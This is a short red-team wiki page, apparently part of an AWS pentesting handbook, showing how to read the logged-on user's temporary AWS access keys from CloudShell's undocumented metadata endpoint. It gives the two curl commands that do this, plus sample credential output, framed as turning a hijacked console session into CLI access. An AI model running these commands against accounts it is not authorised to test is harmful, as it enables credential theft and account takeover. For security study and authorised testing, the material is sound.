Generating IAM Access Keys from CloudShell

Using an undocumented endpoint, we can leverage CloudShell from the AWS Console and create AWS Access Keys for the logged on user.

I originally learned of this from Christophe Tafani-Dereeper's blog post

Why Use This?

When performing pentesting or red teaming, we may encounter a user with console access or gain access to an existing console session
By retrieving AWS Access Keys, we can leverage this for further enumeration from our command line and tools

Obtaining AWS Access Keys from CloudShell

CloudShell provides a ready-to-use CLI environment for the logged-on user/role without needing to set up credentials like you would on say your computer
It's able to do this because it's retrieving credentials each time a command is run (see screenshot) from the instance metadata service

Now that we know the endpoint, we can query it ourselves and get the plaintext credentials

# Get the token 
TOKEN=`curl -X PUT "http://localhost:1338/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"`

# Retrieve creds 
curl -H "X-aws-ec2-metadata-token: $TOKEN" localhost:1338/latest/meta-data/container/security-credentials
{
        "Type": "",
        "AccessKeyId": "ASIAUU...",
        "SecretAccessKey": "ak24Bx8e...",
        "Token": "IQoJb3Jp...",
        "Expiration": "2024-12-18T18:10:17Z",
        "Code": "Success"

PreviousGenerate AWS Console Session NextPassword Spraying AWS IAM Users

Last updated 11 days ago